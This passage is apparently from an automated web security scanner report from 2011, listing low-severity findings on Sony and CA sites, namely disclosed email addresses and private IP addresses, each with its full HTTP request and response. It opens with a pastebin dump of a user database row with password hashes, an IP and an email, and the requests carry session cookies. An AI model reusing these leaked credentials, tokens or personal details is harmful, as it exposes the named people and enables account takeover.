Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 373099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div class="de2">('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')</div>
...[SNIP]...
`mailflag_pmpub`, `mailflag_pmstaff`, `lastvisit`|
('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')

========================
MySQL Information:
========
...[SNIP]...

15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 22:13:59 GMT
Accept-Ranges: bytes
ntCoent-Length: 35386
Content-Type: application/x-javascript
Content-Length: 35386
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

15.6. https://www.ca.com/us/register/createprofile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
</a> and enter your email address (pmfkey@ca.com) for your initial access.</p>
...[SNIP]...
<div class="formtip2 blue small">(john.smith@company.com)<br />
...[SNIP]...

15.7. https://www.ca.com/us/register/forgotpassword.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/forgotpassword.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /us/register/forgotpassword.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/forgotpassword.aspx
Content-Length: 2998
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351643167:ss=1315351389192

__VIEWSTATE=%2FwEPDwULLTE5NTE0OTU5ODEPZBYCAgEQZGQWCGYPZBYOAgkPFgQeBGhyZWYFImh0dHA6Ly93d3cuY2EuY29tL3VzL3Byb2R1Y3RzLmFzcHgeCWlubmVyaHRtbAUIcHJvZHVjdHNkAgoPFgQfAAUuaHR0cDovL3d3dy5jYS5jb20vdXMvY29tbXVuaX
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:40 GMT
Content-Length: 29734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta http-
...[SNIP]...
<input name="retriveEmail" type="text" id="retriveEmail" class="small formfieldwidth2" value="xss@xss.cx" />
...[SNIP]...

15.8. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<p>CA Technologies employees, please use your email address (pmfkey@ca.com) and click <a href="../register/forgotpassword.aspx">
...[SNIP]...

15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/jslib/CalendarPopup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /selfservice/jslib/CalendarPopup.js HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353074542

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"31095-1187921154000"
Last-Modified: Fri, 24 Aug 2007 02:05:54 GMT
Content-Type: text/javascript
Content-Length: 31095
Date: Tue, 06 Sep 2011 18:51:06 GMT

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

16. Private IP addresses disclosed
There are 5 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Aug 2011 19:11:58 GMT
Accept-Ranges: bytes
ntCoent-Length: 30189
Content-Type: application/x-javascript
Content-Length: 30189
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/*
* DEV changelog
*
* 08.04.11 - JT : Adding function trackImpression to populate omniture variable 'prop29' (page state)
* 08.12.11 - JT : Adding code to clear 'prop29' in function 'clearOmni
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Jul 2011 18:28:02 GMT
Accept-Ranges: bytes
ntCoent-Length: 14211
Content-Type: application/x-javascript
Content-Length: 14211
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    TV LANDING PAGE Project JS Functions and Event Listeners
*    
*    Authors:
* Alex Jain, Sr Assoiciate Interactive Development | B2C CST SAPE Augmentation team aljain@sapient
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; 